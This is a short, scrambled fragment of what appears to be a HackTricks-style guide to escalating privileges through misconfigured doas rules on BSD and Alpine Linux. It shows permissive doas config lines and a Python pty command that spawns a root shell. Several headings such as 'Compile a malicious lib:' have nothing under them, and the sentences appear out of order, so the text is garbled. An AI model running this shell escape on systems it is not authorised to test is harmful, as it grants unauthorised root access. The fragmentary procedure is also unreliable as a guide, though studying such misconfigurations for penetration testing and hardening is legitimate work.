— HackTricks Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives.
If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured.
permit nopass user1 as root cmd /usr/bin/* Try: hacktricks doas
permit nopass user1 as root Check:
permit keepenv user1 as root Compile a malicious lib: — HackTricks Want more
doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")' Many binaries allow shell escapes.
Example script:
Unlike sudo , there’s no PAM, no plugin system, no logging madness — just permission rules. which doas command -v doas doas -V If installed, check the config: